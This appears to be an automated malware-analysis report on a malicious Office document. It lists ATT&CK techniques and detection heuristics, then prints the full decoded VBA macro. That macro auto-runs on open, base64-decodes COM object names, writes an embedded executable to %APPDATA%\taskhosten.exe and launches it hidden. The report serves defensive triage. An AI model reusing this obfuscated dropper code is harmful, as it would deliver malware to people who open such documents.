Verdict: MALICIOUS
Risk Score: 358

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The file contains obfuscated VBA macros with AutoOpen and Workbook_Open entry points, which run automatically when the document is opened. The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates that the macro rebuilds strings with a custom decoder before passing them to CreateObject and Shell. The 'SE_ENABLE_LURE' heuristic indicates that the document prompts the user to enable macros. The script attempts to create a 'WScript.Shell' object, likely to download and execute a secondary payload, as indicated by the 'CLAMAV_DETECTION' for Win.Downloader.Carp.
Heuristics (11)

- ClamAV: Win.Downloader.Carp-6307520-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Downloader.Carp-6307520-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 6 related findings): Document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `Shell uzwlcaktigemqvucvzix, vbHide`
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched lines in script: `On Error Resume Next` followed by `Set hqdhfwoybiyesyjvigoz = CreateObject(LVFEnuYuOL("V1NjcmlwdC5TaGVsbA=="))`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script: `On Error Resume Next` followed by `Set hqdhfwoybiyesyjvigoz = CreateObject(LVFEnuYuOL("V1NjcmlwdC5TaGVsbA=="))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`, whose body calls `showDatagram`.
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script: `Sub Workbook_Open()`, whose body calls `showDatagram`.
- Heap-spray pattern detected (high, SC_HEAP_SPRAY): Repeated 0x41 (A) bytes found. Attempted x86 opcode disassembly: offsets 0000DB4A through 0000DBA9 (96 consecutive bytes) all decode as `41 inc ecx`. Note that 0x41 is ASCII "A", and the macro's base64 blob contains long runs of "A" (the base64 encoding of zero bytes), so this pattern is consistent with zero padding inside the encoded payload rather than with injected machine code.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8433 bytes |

SHA-256: 2f6ac28861387d5f7fc368eba769e14602863b7c6ab77ba6e4ae4550b43bbe41

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 7 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub showDatagram()
On Error Resume Next
' LVFEnuYuOL (defined below) is a base64 string decoder; "V1NjcmlwdC5TaGVsbA==" decodes to "WScript.Shell"
Set hqdhfwoybiyesyjvigoz = CreateObject(LVFEnuYuOL("V1NjcmlwdC5TaGVsbA=="))
' La accumulates the base64-encoded embedded payload; decoded fragments include "_CorExeMain" and "mscoree.dll", the entry stub of a .NET executable
Dim La, uzwlcaktigemqvucvzix As String
La = "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"
La = La + "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"
La = La + "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"
La = La + "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"
La = La + "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"
La = La + "wAAAAAAAAAAX0NvckV4ZU1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
La = La + "CAAAAwAAADwNwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
' Drop path: "JUFQUERBVEEl" decodes to "%APPDATA%", "XHRhc2tob3N0ZW4uZXhl" decodes to "\taskhosten.exe"
uzwlcaktigemqvucvzix = hqdhfwoybiyesyjvigoz.ExpandEnvironmentStrings(LVFEnuYuOL("JUFQUERBVEEl")) & LVFEnuYuOL("XHRhc2tob3N0ZW4uZXhl")
' "QURPREIuU3RyZWFt" decodes to "ADODB.Stream"; the stream is used to write the decoded payload bytes to disk
Set wawescrknzcukmwelbsx = CreateObject(LVFEnuYuOL("QURPREIuU3RyZWFt"))
wawescrknzcukmwelbsx.Open
' Type = 1 is adTypeBinary
wawescrknzcukmwelbsx.Type = 1
' merde() converts the base64 text in La to raw bytes
wawescrknzcukmwelbsx.Write merde(La)
wawescrknzcukmwelbsx.Position = 0
wawescrknzcukmwelbsx.SaveToFile uzwlcaktigemqvucvzix
wawescrknzcukmwelbsx.Close
' Executes the dropped file with a hidden window
Shell uzwlcaktigemqvucvzix, vbHide
End Sub
' Base64-to-bytes via MSXML: "TWljcm9zb2Z0LlhNTERPTQ==" decodes to "Microsoft.XMLDOM", "dG1w" to "tmp", "YmluLmJhc2U2NA==" to "bin.base64"
Private Function merde(bobby)
Dim DM, EL
Set DM = CreateObject(LVFEnuYuOL("TWljcm9zb2Z0LlhNTERPTQ=="))
Set EL = DM.createElement(LVFEnuYuOL("dG1w"))
EL.DataType = LVFEnuYuOL("YmluLmJhc2U2NA==")
EL.Text = bobby
merde = EL.NodeTypedValue
End Function
' Hand-rolled base64 string decoder; keeps the COM ProgIDs and file paths above out of the plain macro source
Function LVFEnuYuOL(ByVal yyPdMVSXBI)
Const HEgTymDLVn = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
yyPdMVSXBI = Replace(yyPdMVSXBI, vbCrLf, "")
yyPdMVSXBI = Replace(yyPdMVSXBI, vbTab, "")
yyPdMVSXBI = Replace(yyPdMVSXBI, " ", "")
dataLength = Len(yyPdMVSXBI)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "LVFEnuYuOL", ""
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(yyPdMVSXBI, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, HEgTymDLVn, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "LVFEnuYuOL", ""
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
LVFEnuYuOL = sOut
End Function
Sub AutoOpen()
showDatagram
End Sub
Sub Workbook_Open()
showDatagram
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True